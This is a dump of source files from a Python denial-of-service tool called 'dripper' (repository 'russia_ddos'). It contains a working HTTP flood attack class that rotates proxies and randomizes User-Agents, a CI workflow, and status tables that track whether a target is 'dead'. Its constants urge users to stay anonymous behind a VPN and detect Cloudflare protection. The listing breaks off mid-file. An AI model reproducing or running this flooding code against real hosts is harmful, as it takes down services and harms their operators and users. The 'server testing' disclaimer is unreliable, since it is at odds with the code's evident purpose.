| uses: docker/setup-qemu-action@v1 60 | 61 | - name: Set up Docker Buildx 62 | if: runner.os == 'Linux' 63 | id: buildx 64 | uses: docker/setup-buildx-action@v1 65 | 66 | - name: Configure Docker metadata 67 | if: runner.os == 'Linux' 68 | id: meta 69 | uses: docker/metadata-action@v3 70 | with: 71 | images: ${{ env.IMAGE_NAME }} 72 | tags: | 73 | type=ref,event=branch 74 | type=ref,event=pr 75 | type=semver,pattern={{version}} 76 | type=semver,pattern={{major}}.{{minor}} 77 | type=semver,pattern={{major}} 78 | 79 | - name: Login to Docker Hub 80 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 81 | uses: docker/login-action@v1 82 | with: 83 | username: ${{ secrets.DOCKERHUB_USERNAME }} 84 | password: ${{ secrets.DOCKERHUB_TOKEN }} 85 | 86 | - name: Build and push 87 | if: runner.os == 'Linux' 88 | uses: docker/build-push-action@v2 89 | with: 90 | context: . 91 | platforms: linux/amd64,linux/arm64,linux/ppc64le,linux/s390x,linux/386,linux/arm/v7,linux/arm/v6 92 | push: ${{ github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' }} 93 | tags: ${{ steps.meta.outputs.tags }} 94 | labels: ${{ steps.meta.outputs.labels }} 95 | 96 | - name: Update Docker Hub Description 97 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 98 | uses: peter-evans/dockerhub-description@v2 99 | env: 100 | DOCKERHUB_USERNAME: ${{ secrets.DOCKERHUB_USERNAME }} 101 | DOCKERHUB_PASSWORD: ${{ secrets.DOCKERHUB_PASSWORD }} 102 | DOCKERHUB_REPOSITORY: ${{ env.IMAGE_NAME }} 103 | 104 | - name: Get the release version 105 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 106 | id: get-version 107 | run: | 108 | echo "::set-output name=version::${GITHUB_REF#refs/tags/}" 109 | 110 | - name: Prepare Release Notes 111 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 112 | run: | 113 | ./.github/release-notes.sh ./CHANGELOG.md > ./release-notes.md 114 | 115 | - name: Update Release notes 116 | if: github.event_name == 'push' && startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 117 | uses: ncipollo/release-action@v1 118 | with: 119 | token: ${{ secrets.GITHUB_TOKEN }} 120 | name: ${{ steps.get-version.outputs.version }} 121 | tag: ${{ steps.get-version.outputs.version }} 122 | bodyFile: "./release-notes.md" 123 | allowUpdates: true 124 | 125 | - name: Fast attack test using Docker 126 | if: github.event_name == 'push' && !startsWith(github.ref, 'refs/tags/') && runner.os == 'Linux' 127 | run: | 128 | docker build -t alexmon1989/dripper:ci-test --no-cache --rm . 129 | docker run -i --rm alexmon1989/dripper:ci-test -t 1 -s https://httpbin.org:443 --dry-run 130 | -------------------------------------------------------------------------------- /ripper/constants.py: -------------------------------------------------------------------------------- 1 | from _version import __version__ 2 | 3 | ############################################### 4 | # Constants | Logo and help messages 5 | ############################################### 6 | VERSION = f'v{__version__}' 7 | USAGE = 'Usage: %prog [options] arg' 8 | EPILOG = 'Example: dripper -t 100 -m tcp-flood -s tcp://192.168.0.1:80' 9 | GITHUB_OWNER = 'alexmon1989' 10 | GITHUB_REPO = 'russia_ddos' 11 | GITHUB_ID = f'{GITHUB_OWNER}/{GITHUB_REPO}' 12 | GITHUB_URL = f'https://github.com/{GITHUB_ID}' 13 | 14 | LOGO_COLOR = f'''[deep_sky_blue1] 15 | ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗ 16 | ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║ 17 | ██║ ██║██████╔╝██║██████╔╝██████╔╝█████╗ ██████╔╝[bright_yellow] 18 | ██║ ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝ ██╔══██╗ 19 | ██████╔╝██║ ██║██║██║ ██║ ███████╗██║ ██║ 20 | ╚═════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ 21 | [green]{VERSION} 22 | [grey53] 23 | It is the end user's responsibility to obey all applicable laws. 24 | It is just like a server testing script and Your IP is visible. 25 | Please, make sure you are ANONYMOUS! 26 | 27 | [u blue link={GITHUB_URL}]{GITHUB_URL}[/] 28 | ''' 29 | 30 | LOGO_NOCOLOR = f''' 31 | ██████╗ ██████═╗██╗██████╗ ██████╗ ███████╗██████═╗ 32 | ██╔══██╗██╔══██║██║██╔══██╗██╔══██╗██╔════╝██╔══██║ 33 | ██║ ██║██████╔╝██║██████╔╝██████╔╝█████╗ ██████╔╝ 34 | ██║ ██║██╔══██╗██║██╔═══╝ ██╔═══╝ ██╔══╝ ██╔══██╗ 35 | ██████╔╝██║ ██║██║██║ ██║ ███████╗██║ ██║ 36 | ╚═════╝ ╚═╝ ╚═╝╚═╝╚═╝ ╚═╝ ╚══════╝╚═╝ ╚═╝ 37 | {VERSION} 38 | 39 | It is the end user's responsibility to obey all applicable laws. 40 | It is just like a server testing script and Your IP is visible. 41 | Please, make sure you are ANONYMOUS! 42 | 43 | {GITHUB_URL} 44 | ''' 45 | 46 | BANNER = '\n\n[r][deep_sky_blue1]#StandWith[bright_yellow]Ukraine[/]' 47 | CONTROL_CAPTION = f'[grey53]Press [green]CTRL+C[grey53] to interrupt process.{BANNER}\n' 48 | 49 | DEFAULT_CURRENT_IP_VALUE = '...detecting' 50 | HOST_IN_PROGRESS_STATUS = 'HOST_IN_PROGRESS' 51 | HOST_FAILED_STATUS = 'HOST_FAILED' 52 | HOST_SUCCESS_STATUS = 'HOST_SUCCESS' 53 | 54 | # ==== Badge templates ==== 55 | BADGE_INFO = '[bold gray0 on cyan] {message} [/]' 56 | BADGE_WARN = '[bold gray0 on orange1] {message} [/]' 57 | BADGE_ERROR = '[bold white on red1] {message} [/]' 58 | 59 | 60 | # ==== Formats and Constants 61 | DATE_TIME_FULL = '%Y-%m-%d %H:%M:%S' 62 | DATE_TIME_SHORT = '%H:%M:%S' 63 | 64 | 65 | # ==== Defaults for Input ARGS === 66 | ARGS_DEFAULT_PORT = 80 67 | ARGS_DEFAULT_THREADS_COUNT = 'auto' 68 | ARGS_DEFAULT_HEALTH_CHECK = 1 69 | ARGS_DEFAULT_HTTP_ATTACK_METHOD = 'GET' 70 | ARGS_DEFAULT_HTTP_REQUEST_PATH = '/' 71 | ARGS_DEFAULT_SOCK_TIMEOUT = 1 72 | ARGS_DEFAULT_PROXY_TYPE = 'socks5' 73 | 74 | 75 | # ==== Defaults ==== 76 | GEOIP_NOT_DEFINED = '--' 77 | CONNECT_TO_HOST_MAX_RETRY = 5 78 | MIN_SCREEN_WIDTH = 100 79 | MIN_UPDATE_HOST_STATUSES_TIMEOUT = 120 80 | SUCCESSFUL_CONNECTIONS_CHECK_PERIOD_SEC = 300 81 | NO_SUCCESSFUL_CONNECTIONS_DIE_PERIOD_SEC = 300 82 | HTTP_STATUS_CODE_CHECK_PERIOD_SEC = 10 83 | UPDATE_CURRENT_IP_CHECK_PERIOD_SEC = 60 84 | TARGET_STATS_AUTO_PAGINATION_INTERVAL_SECONDS = 5 85 | MIN_ALIVE_AVAILABILITY_PERCENTAGE = 50 86 | DEFAULT_LOG_LEVEL = 'warn' 87 | DEFAULT_LOG_SIZE = 5 88 | MAX_AUTOSCALE_CPU_PERCENTAGE = 80 89 | MAX_FAILED_FAILED_AUTOSCALE_TESTS = 5 90 | DEFAULT_AUTOSCALE_TEST_SECONDS = 0.5 91 | DEFAULT_MIN_RND_PACKET_LEN = 1 92 | DEFAULT_MAX_RND_PACKET_LEN = 1024 93 | 94 | # ==== Sockets ==== 95 | PROXY_MAX_FAILURE_RATIO = 0.8 96 | PROXY_MIN_VALIDATION_REQUESTS = 8 97 | 98 | 99 | CLOUDFLARE_TAGS = [ 100 | 'cloudflare', 101 | 'cf-spinner-please-wait', 102 | 'we are checking your browser...', 103 | 'Cloudflare Ray ID' 104 | ] 105 | 106 | # ==== Error messages ==== 107 | GETTING_SERVER_IP_ERR_MSG = 'Can\'t get server IP. Packet sending failed. Check your VPN.' 108 | NO_SUCCESSFUL_CONNECTIONS_ERR_MSG = 'There are no successful connections more than 2 min. ' \ 109 | 'Check your VPN or change host/port.' \ 110 | 'If you are using the proxylist then proxy validation might be in progress.' 111 | YOUR_IP_WAS_CHANGED_ERR_MSG = 'Your IP was changed!!! Check VPN connection.' 112 | CANNOT_SEND_REQUEST_ERR_MSG = 'Cannot send Request or Packet. Host does not respond.' 113 | NO_MORE_PROXIES_ERR_MSG = 'There are no more operational proxies to work with host.' 114 | MSG_YOUR_IP_WAS_CHANGED = 'IP changed' 115 | MSG_CHECK_VPN_CONNECTION = 'Check VPN' 116 | MSG_DONT_USE_VPN_WITH_PROXY = 'Do not use VPN with proxy' 117 | NO_CONNECTIONS_ERR_MSG = f"There were no successful connections for more " \ 118 | f"than {NO_SUCCESSFUL_CONNECTIONS_DIE_PERIOD_SEC // 60} minutes. " \ 119 | f"Your attack is ineffective." 120 | TARGET_DEAD_ERR_MSG = "[orange1]Target should be dead!" 121 | NO_MORE_TARGETS_LEFT_ERR_MSG = 'No more valid targets left' 122 | -------------------------------------------------------------------------------- /ripper/stats/target_stats_manager.py: -------------------------------------------------------------------------------- 1 | from collections import defaultdict 2 | 3 | from ripper.stats.packets_stats import PacketsStats 4 | from ripper.stats.connection_stats import ConnectionStats 5 | from ripper.stats.utils import Row, build_http_codes_distribution, rate_color 6 | from ripper import common 7 | from ripper.constants import * 8 | from ripper.health_check_manager import HealthStatus, AvailabilityDistribution 9 | 10 | Target = 'Target' 11 | 12 | 13 | class TargetStatsManager: 14 | """Encapsulates target-related statistics.""" 15 | 16 | target: Target = None 17 | """Related target""" 18 | packets: PacketsStats = None 19 | """Collect all the stats about TCP/UDP and HTTP packets.""" 20 | http_stats = None 21 | """Collect stats about HTTP response codes.""" 22 | connect: ConnectionStats = None 23 | """Collect all the Connections stats via Socket or HTTP Client.""" 24 | 25 | def __init__(self, target: Target): 26 | self.target = target 27 | self.packets = PacketsStats() 28 | self.connect = ConnectionStats() 29 | self.http_stats = defaultdict(int) 30 | 31 | def collect_packets_success(self, sent_bytes: int = 0): 32 | self.packets.status_sent(sent_bytes) 33 | 34 | def get_availability_msg(self) -> str: 35 | if self.target.health_check_manager.is_forbidden: 36 | return f'[orange1]Your IP was blocked with anti-bot or anti DDoS[/]' \ 37 | f'\nCheck status - CTRL+click on [u blue link={self.target.health_check_manager.request_url}]link' 38 | 39 | status: HealthStatus = self.target.health_check_manager.status 40 | if status == HealthStatus.start_pending or status == HealthStatus.undefined: 41 | return f'...detecting ({self.target.health_check_manager.health_check_method.upper()} method)' 42 | 43 | avd: AvailabilityDistribution = self.target.health_check_manager.availability_distribution 44 | time_str = common.format_dt(self.target.health_check_manager.last_host_statuses_update, DATE_TIME_SHORT) 45 | accessible_message = f'[{time_str}] Accessible in {avd.succeeded} of {avd.total} zones ({avd.availability_percentage}%)' 46 | 47 | if status == HealthStatus.alive: 48 | return accessible_message 49 | 50 | if status == HealthStatus.dead: 51 | return f'{accessible_message}\n{TARGET_DEAD_ERR_MSG}' 52 | 53 | def get_packet_length_msg(self) -> str: 54 | if self.target.min_random_packet_len == self.target.max_random_packet_len: 55 | return f'{self.target.max_random_packet_len}' 56 | return f'From {self.target.min_random_packet_len} to {self.target.max_random_packet_len}' 57 | 58 | def build_target_details_stats(self) -> list[Row]: 59 | """Prepare data for global part of statistics.""" 60 | sent_units = 'Requests' if self.target.attack_method.lower() == 'http' else 'Packets' 61 | conn_success_rate = self.target.stats.connect.get_success_rate() 62 | 63 | duration = self.target.time_interval_manager.execution_duration 64 | packets_rps = int(self.target.stats.packets.total_sent / duration.total_seconds()) 65 | data_rps = int(self.target.stats.packets.total_sent_bytes / duration.total_seconds()) 66 | is_health_check = bool(self.target.health_check_manager) 67 | 68 | _sent_bytes_formatted = common.convert_size(self.target.stats.packets.total_sent_bytes) 69 | _indent = max( 70 | len(str(self.target.stats.packets.total_sent)), 71 | len(_sent_bytes_formatted) 72 | ) 73 | 74 | full_stats: list[Row] = [ 75 | # Description Status 76 | Row('Country, Host IP', f'[red]{self.target.country:4}[/][cyan]{self.target.host_ip}:{self.target.port} [dim](target-{self.target.index})[/]'), 77 | Row('HTTP Request', f'[cyan]{self.target.http_method}: {self.target.http_url}', visible=self.target.attack_method.lower() == 'http-flood'), 78 | Row('Attack Method', self.target.attack_method.upper()), 79 | Row('Random Packet Length (bytes)', self.get_packet_length_msg(), visible=(self.target.min_random_packet_len or self.target.max_random_packet_len)), 80 | Row('Threads', str(len(self.target.attack_threads))), 81 | Row('CloudFlare Protection', ('[red]' if self.target.is_cloud_flare_protection else '[green]') + self.target.cloudflare_status(), end_section=not is_health_check), 82 | Row('Availability (check-host.net)', f'{self.get_availability_msg()}', visible=is_health_check), 83 | Row('Sent Bytes @ AVG speed', f'{_sent_bytes_formatted:{_indent}} @ [green]{common.convert_size(data_rps, "B/s")}'), 84 | Row(f'Sent {sent_units} @ AVG speed', f'{self.target.stats.packets.total_sent:{_indent},} @ [green]{packets_rps} {sent_units.lower()}/s'), 85 | # === Info UDP/TCP => insert Sent bytes statistic 86 | Row('Connections', f'success: [green]{self.target.stats.connect.success}[/], failed: [red]{self.target.stats.connect.failed}[/], success rate: {rate_color(conn_success_rate, " %")}', end_section=True), 87 | # =================================== 88 | Row('Status Code Distribution', build_http_codes_distribution(self.target.stats.http_stats), end_section=True, visible=self.target.attack_method.lower() == 'http-flood'), 89 | ] 90 | 91 | return full_stats 92 | -------------------------------------------------------------------------------- /ripper/actions/http_flood.py: -------------------------------------------------------------------------------- 1 | import random 2 | import re 3 | from contextlib import suppress 4 | from socket import socket 5 | from socks import ProxyError 6 | 7 | from ripper.constants import HTTP_STATUS_CODE_CHECK_PERIOD_SEC 8 | from ripper.context.events_journal import EventsJournal 9 | from ripper.context.target import Target 10 | from ripper.actions.attack_method import AttackMethod 11 | from ripper.proxy import Proxy 12 | 13 | HTTP_STATUS_PATTERN = re.compile(r" (\d{3}) ") 14 | # Forward Reference 15 | Context = 'Context' 16 | 17 | events_journal = EventsJournal() 18 | 19 | 20 | class HttpFlood(AttackMethod): 21 | """HTTP Flood method.""" 22 | 23 | name: str = 'HTTP Flood' 24 | label: str = 'http-flood' 25 | 26 | _target: Target 27 | _ctx: Context 28 | _proxy: Proxy = None 29 | _http_connect: socket = None 30 | 31 | def __init__(self, target: Target, context: Context): 32 | self._target = target 33 | self._ctx = context 34 | 35 | def create_connection(self): 36 | self._proxy = self._ctx.proxy_manager.get_random_proxy() 37 | conn = self._ctx.sock_manager.create_tcp_socket(self._proxy) 38 | 39 | return conn 40 | 41 | def __call__(self, *args, **kwargs): 42 | with suppress(Exception), self.create_connection() as self._http_connect: 43 | self._http_connect.connect(self._target.hostip_port_tuple()) 44 | self._target.stats.connect.status_success() 45 | events_journal.info('Creating HTTP connection...', target=self._target) 46 | while self.send(self._http_connect): 47 | if self._ctx.dry_run: 48 | break 49 | continue 50 | self._ctx.target.stats.connect.status_failed() 51 | 52 | # TODO remove from flood class, status name is not part of flood program 53 | def _send_event_with_status(self, code: int): 54 | base = 'Checked Response status...' 55 | if code < 300: 56 | events_journal.info(f'{base} {code}: Success', target=self._target) 57 | elif 299 > code < 400: 58 | events_journal.warn(f'{base} {code}: Redirection', target=self._target) 59 | elif code == 400: 60 | events_journal.warn(f'{base} {code}: Bad Request', target=self._target) 61 | elif 400 > code <= 403: 62 | events_journal.warn(f'{base} {code}: Forbidden', target=self._target) 63 | elif code == 404: 64 | events_journal.warn(f'{base} {code}: Not Found', target=self._target) 65 | elif 404 > code < 408: 66 | events_journal.warn(f'{base} {code}: Not Acceptable or Not Allowed', target=self._target) 67 | elif code == 408: 68 | events_journal.warn(f'{base} {code}: Request Timeout', target=self._target) 69 | elif 408 > code < 429: 70 | events_journal.error(f'{base} {code}: Client Error', target=self._target) 71 | elif code == 429: 72 | events_journal.error(f'{base} {code}: Too Many Requests', target=self._target) 73 | elif 429 > code < 459: 74 | events_journal.error(f'{base} {code}: Client Error', target=self._target) 75 | elif 460 >= code <= 463: 76 | events_journal.error(f'{base} {code}: AWS Load Balancer Error', target=self._target) 77 | elif 499 > code <= 511: 78 | events_journal.error(f'{base} {code}: Server Error', target=self._target) 79 | elif 520 >= code <= 530: 80 | events_journal.error(f'{base} {code}: CloudFlare Reverse Proxy Error', target=self._target) 81 | else: 82 | events_journal.error(f'{base} {code}: Custom Error', target=self._target) 83 | 84 | def check_response_status(self, payload: bytes): 85 | with suppress(Exception): 86 | if self._ctx.time_interval_manager.check_timer_elapsed(HTTP_STATUS_CODE_CHECK_PERIOD_SEC): 87 | check_sock = self.create_connection() 88 | check_sock.connect(self._target.hostip_port_tuple()) 89 | check_sock.send(payload) 90 | http_response = repr(check_sock.recv(32)) 91 | check_sock.close() 92 | status = int(re.search(HTTP_STATUS_PATTERN, http_response)[1]) 93 | self._target.stats.http_stats[status] += 1 94 | self._send_event_with_status(status) 95 | 96 | def send(self, sock: socket) -> bool: 97 | payload = self.payload().encode('utf-8') 98 | try: 99 | sent = sock.send(payload) 100 | self.check_response_status(payload) 101 | except ProxyError: 102 | self._ctx.proxy_manager.delete_proxy_sync(self._proxy) 103 | except Exception as e: 104 | self._target.stats.connect.status_failed() 105 | events_journal.exception(e, target=self._target) 106 | else: 107 | self._target.stats.packets.status_sent(sent) 108 | self._proxy.report_success() if self._proxy is not None else 0 109 | return True 110 | return False 111 | 112 | def headers(self, content: str = '') -> dict[str, str]: 113 | """Prepare headers.""" 114 | headers = self._ctx.headers_provider.headers 115 | headers['Content-Length'] = str(len(content)) 116 | headers['User-Agent'] = random.choice(self._ctx.headers_provider.user_agents) 117 | 118 | return headers 119 | 120 | def payload(self, body: str = '') -> str: 121 | """Generate payload for Request.""" 122 | body_content = f'{body}\r\n\r\n' if body else '\r\n' 123 | headers = '\r\n'.join([f'{key}: {value}' for (key, value) in self.headers(body).items()]) 124 | 125 | request = '{} {} HTTP/1.1\r\nHost: {}\r\n{}\r\n{}'.format( 126 | self._target.http_method.upper(), 127 | self._target.http_path, 128 | self._target.host, 129 | headers, 130 | body_content 131 | ) 132 | 133 | return request 134 | -------------------------------------------------------------------------------- /tests/test_health_check_manager.py: -------------------------------------------------------------------------------- 1 | import pytest as pytest 2 | from collections import namedtuple 3 | from datetime import datetime 4 | 5 | from ripper.context.context import Context 6 | from ripper.health_check_manager import classify_host_status, count_host_statuses 7 | from ripper.constants import HOST_IN_PROGRESS_STATUS, HOST_FAILED_STATUS, HOST_SUCCESS_STATUS 8 | from ripper.headers_provider import HeadersProvider 9 | 10 | Args = namedtuple('Args', 'targets threads_count') 11 | 12 | 13 | class DescribeHealthCheck: 14 | @pytest.mark.parametrize('value, status', [ 15 | (None, HOST_IN_PROGRESS_STATUS), 16 | ([{'error': 'Connection timed out'}], HOST_FAILED_STATUS), 17 | ([{'address': '4.2.2.2', 'time': 0.040173}], HOST_SUCCESS_STATUS), 18 | ([{'address': '172.217.20.206', 'timeout': 1}], HOST_SUCCESS_STATUS), 19 | ([{'address': '172.217.20.206', 'error': 'Exiting subroutine via redo at /usr/local/share/perl/5.24.1/AnyEvent/Handle/UDP.pm line 246.\n', 'time': 0.000176}], HOST_FAILED_STATUS), 20 | ([[1, 0.103471040725708, 'Moved Permanently', '301', '172.217.20.206']], HOST_SUCCESS_STATUS), 21 | ([[0, 0.000416994094848633, 'Bad file descriptor', None, None]], HOST_FAILED_STATUS), 22 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['OK', 0.0315918922424316], ['OK', 0.0318388938903809], ['OK', 0.0318410396575928]]], HOST_SUCCESS_STATUS), 23 | ([[['TIMEOUT', 3.00089383125305, '121.11.11.11'], ['TIMEOUT', 3.0002110004425], ['TIMEOUT', 3.00109696388245], ['TIMEOUT', 3.00079393386841]]], HOST_FAILED_STATUS), 24 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['OK', 0.0315918922424316], ['OK', 0.0318388938903809], ['TIMEOUT', 3.0318410396575928]]], HOST_SUCCESS_STATUS), 25 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['OK', 0.0315918922424316], ['TIMEOUT', 3.0318388938903809], ['TIMEOUT', 3.0318410396575928]]], HOST_SUCCESS_STATUS), 26 | ([[['OK', 0.0316579341888428, '172.217.20.206'], ['TIMEOUT', 3.0315918922424316], ['TIMEOUT', 3.0318388938903809], ['TIMEOUT', 3.0318410396575928]]], HOST_FAILED_STATUS), 27 | ]) 28 | def it_classifies_host_status(self, value, status): 29 | assert classify_host_status(value) == status 30 | 31 | @pytest.mark.parametrize('distribution, statuses_counter', [ 32 | ({"at1.node.check-host.net": [{"address": "95.173.136.72","time": 0.067267}], "ch1.node.check-host.net": [{"address": "95.173.136.72","time": 0.080538}], "de4.node.check-host.net": [{"address": "95.173.136.72","time": 1.078855}], "ir1.node.check-host.net": [{'error': 'Connection timed out'}], "it2.node.check-host.net": [{"address": "95.173.136.71","time": 0.063825}], "md1.node.check-host.net": [{"address": "95.173.136.70","time": 0.159452}], "nl1.node.check-host.net": [{'error': 'Connection timed out'}], "us1.node.check-host.net": None, "us2.node.check-host.net": [{"address": "95.173.136.70","time": 0.13008}]}, 33 | {'HOST_IN_PROGRESS': 1, 'HOST_FAILED': 2, 'HOST_SUCCESS': 6}), 34 | ({}, {}), 35 | ]) 36 | def it_counts_host_statuses(self, distribution, statuses_counter): 37 | actual = count_host_statuses(distribution) 38 | assert len(actual) == len(statuses_counter) 39 | for (key, value) in statuses_counter.items(): 40 | assert actual[key] == value 41 | 42 | # slow 43 | @pytest.mark.skip(reason="Use this test only for dev, it can fail because depends from external service.") 44 | def it_can_fetch_host_statuses(self): 45 | args = Args( 46 | # TODO expect target_uri in args as well 47 | targets=['https://httpbin.org'], 48 | threads_count=100, 49 | ) 50 | context = Context(args) 51 | context.__init__(args) 52 | assert len(context.targets_manager.targets[0].host_ip) > 0 53 | 54 | health_check_manager = context.targets_manager.targets[0].health_check_manager 55 | 56 | before_execution = datetime.now() 57 | distribution = health_check_manager.update_host_statuses() 58 | after_execution = datetime.now() 59 | 60 | # some nodes have issues with file descriptor or connection 61 | assert distribution[HOST_SUCCESS_STATUS] > 17 62 | # state should be updated 63 | assert distribution == health_check_manager.host_statuses 64 | assert not health_check_manager.is_in_progress 65 | assert health_check_manager.last_host_statuses_update >= before_execution 66 | assert health_check_manager.last_host_statuses_update <= after_execution 67 | 68 | @pytest.mark.parametrize('args_data, url', [ 69 | ({'target_uri': 'https://google.com', 'health_check_method': 'http'}, 'https://check-host.net/check-http?host=google.com'), 70 | ({'target_uri': 'https://google.com', 'health_check_method': 'http'}, 'https://check-host.net/check-http?host=google.com'), 71 | ({'target_uri': 'http://google.com:92', 'health_check_method': 'http'}, 'https://check-host.net/check-http?host=google.com:92'), 72 | ({'target_uri': 'tcp://google.com:443', 'host_ip': '172.217.20.206', 'health_check_method': 'tcp'}, 'https://check-host.net/check-tcp?host=172.217.20.206:443'), 73 | ({'target_uri': 'udp://google.com:443', 'host_ip': '172.217.20.206', 'health_check_method': 'ping'}, 'https://check-host.net/check-ping?host=172.217.20.206'), 74 | ]) 75 | def it_constructs_request_url(self, args_data, url): 76 | args = Args( 77 | # TODO expect target_uri in args as well 78 | targets=[args_data['target_uri']], 79 | threads_count=100, 80 | ) 81 | context = Context(args) 82 | context.__init__(args) 83 | assert context.targets_manager.targets[0].health_check_manager.health_check_method == args_data['health_check_method'] 84 | if 'host_ip' in args_data: 85 | context.targets_manager.targets[0].host_ip = args_data['host_ip'] 86 | assert context.targets_manager.targets[0].health_check_manager.request_url == url 87 | 88 | @pytest.fixture(scope='session', autouse=True) 89 | def refresh_headers_provider(self): 90 | HeadersProvider().refresh() 91 | -------------------------------------------------------------------------------- /ripper/stats/context_stats_manager.py: -------------------------------------------------------------------------------- 1 | from datetime import timedelta 2 | from math import floor 3 | from rich.table import Table 4 | from rich import box 5 | 6 | from ripper.context.target import Target 7 | from ripper.stats.utils import Row, badge_error, badge_warn 8 | from rich.console import Group 9 | from ripper import common 10 | from ripper.constants import * 11 | from ripper.time_interval_manager import TimeIntervalManager 12 | from ripper.context.events_journal import EventsJournal 13 | from ripper.github_updates_checker import GithubUpdatesChecker 14 | 15 | Context = 'Context' 16 | events_journal = EventsJournal() 17 | 18 | 19 | class ContextStatsManager: 20 | _ctx: Context = None 21 | """Context we are working with.""" 22 | 23 | time_interval_manager: TimeIntervalManager = None 24 | guc: GithubUpdatesChecker = None 25 | 26 | def __init__(self, _ctx: Context): 27 | self._ctx = _ctx 28 | self.time_interval_manager = TimeIntervalManager() 29 | guc = GithubUpdatesChecker() 30 | guc.demon_update_latest_version() 31 | 32 | @property 33 | def current_target_idx(self) -> int: 34 | """ 35 | We show one target details at the same time. 36 | Pagination happens automatically. 37 | Method calculates current index of target to display based on script execution duration. 38 | """ 39 | duration = self.time_interval_manager.execution_duration.total_seconds() 40 | cnt = self._ctx.targets_manager.targets_count() 41 | change_interval = TARGET_STATS_AUTO_PAGINATION_INTERVAL_SECONDS 42 | return floor((duration/change_interval) % cnt) 43 | 44 | @property 45 | def current_target(self) -> Target: 46 | return self._ctx.targets_manager.targets[self.current_target_idx] 47 | 48 | @property 49 | def duration(self) -> timedelta: 50 | return self.time_interval_manager.execution_duration \ 51 | if self._ctx.duration_manager.duration is None \ 52 | else self._ctx.duration_manager.remaining_duration 53 | 54 | def build_global_details_stats(self) -> list[Row]: 55 | """Prepare data for global part of statistics.""" 56 | is_proxy_list = bool(self._ctx.proxy_manager.proxy_list and len(self._ctx.proxy_manager.proxy_list)) 57 | 58 | your_ip_disclaimer = f'{badge_warn(MSG_DONT_USE_VPN_WITH_PROXY)}' if is_proxy_list else '' 59 | your_ip_was_changed = f'{badge_error(MSG_YOUR_IP_WAS_CHANGED)} {badge_warn(MSG_CHECK_VPN_CONNECTION)}[/]' if self._ctx.myIpInfo.is_ip_changed() else '' 60 | 61 | full_stats: list[Row] = [ 62 | # Description Status 63 | Row('Start Time, Duration', f'{common.format_dt(self._ctx.time_interval_manager.start_time)} ({str(self.duration).split(".", 2)[0]})'), 64 | Row('Your Country, Public IP', f'[green]{self._ctx.myIpInfo.country:4}[/] [cyan]{self._ctx.myIpInfo.ip_masked:20}[/] {your_ip_disclaimer}{your_ip_was_changed}'), 65 | Row('Total Threads', f'{self._ctx.targets_manager.threads_count}', visible=self._ctx.targets_manager.targets_count() > 1), 66 | Row('Proxies Count', f'[cyan]{len(self._ctx.proxy_manager.proxy_list)} | {self._ctx.proxy_manager.proxy_list_initial_len}', visible=is_proxy_list), 67 | Row('Proxies Type', f'[cyan]{self._ctx.proxy_manager.proxy_type.value}', visible=is_proxy_list), 68 | Row('vCPU Count', f'{self._ctx.cpu_count}'), 69 | Row('Socket Timeout (seconds)', f'{self._ctx.sock_manager.socket_timeout}', end_section=True), 70 | # =================================== 71 | ] 72 | 73 | return full_stats 74 | 75 | def build_target_rotation_header_details_stats(self) -> list[Row]: 76 | cnt = self._ctx.targets_manager.targets_count() 77 | if cnt < 2: 78 | return [] 79 | 80 | duration = self.time_interval_manager.execution_duration.total_seconds() 81 | change_interval = TARGET_STATS_AUTO_PAGINATION_INTERVAL_SECONDS 82 | current_position = duration/change_interval 83 | next_target_in_seconds = 1 + floor(change_interval * (1 - (current_position - floor(current_position)))) 84 | return [ 85 | Row(f'[cyan][bold]Target ({self.current_target.uri})', f'{self.current_target_idx + 1}/{cnt} (next in {next_target_in_seconds})', end_section=True), 86 | # =================================== 87 | ] 88 | 89 | def build_details_stats_table(self) -> Table: 90 | details_table = Table( 91 | style='bold', 92 | box=box.HORIZONTALS, 93 | width=MIN_SCREEN_WIDTH, 94 | caption=CONTROL_CAPTION if not events_journal.get_max_event_level() else None, 95 | caption_style='bold', 96 | ) 97 | 98 | details_table.add_column('Description', width=45) 99 | details_table.add_column('Status', width=MIN_SCREEN_WIDTH - 45) 100 | 101 | rows = self.build_global_details_stats() 102 | rows += self.build_target_rotation_header_details_stats() 103 | if self.current_target: 104 | rows += self.current_target.stats.build_target_details_stats() 105 | 106 | for row in rows: 107 | if row.visible: 108 | details_table.add_row(row.label, row.value, end_section=row.end_section) 109 | 110 | return details_table 111 | 112 | def build_events_table(self) -> Table: 113 | events_log = Table( 114 | box=box.SIMPLE, 115 | width=MIN_SCREEN_WIDTH, 116 | caption=CONTROL_CAPTION, 117 | caption_style='bold') 118 | 119 | events_log.add_column(f'[blue]Events Log', style='dim') 120 | 121 | for event in events_journal.get_log(): 122 | events_log.add_row(event) 123 | 124 | return events_log 125 | 126 | def build_stats(self): 127 | """Create statistics from aggregated RAW Statistics data.""" 128 | details_table = self.build_details_stats_table() 129 | events_table = self.build_events_table() if events_journal.get_max_event_level() else None 130 | parts = filter(lambda v: v is not None, [ 131 | details_table, events_table]) 132 | return Group(*parts) 133 | -------------------------------------------------------------------------------- /ripper/context/target.py: -------------------------------------------------------------------------------- 1 | import time 2 | from typing import Tuple 3 | from urllib.parse import urlparse 4 | 5 | from ripper.health_check_manager import HealthCheckManager 6 | from ripper import common 7 | from ripper.constants import * 8 | from ripper.stats.target_stats_manager import TargetStatsManager 9 | from ripper.time_interval_manager import TimeIntervalManager 10 | 11 | Attack = 'Attack' 12 | 13 | 14 | def default_scheme_port(scheme: str): 15 | scheme_lc = scheme.lower() 16 | if scheme_lc == 'http' or scheme_lc == 'tcp': 17 | return 80 18 | if scheme_lc == 'https': 19 | return 443 20 | if scheme_lc == 'udp': 21 | return 53 22 | return None 23 | 24 | 25 | class Target: 26 | index: int = 0 27 | """Target index for 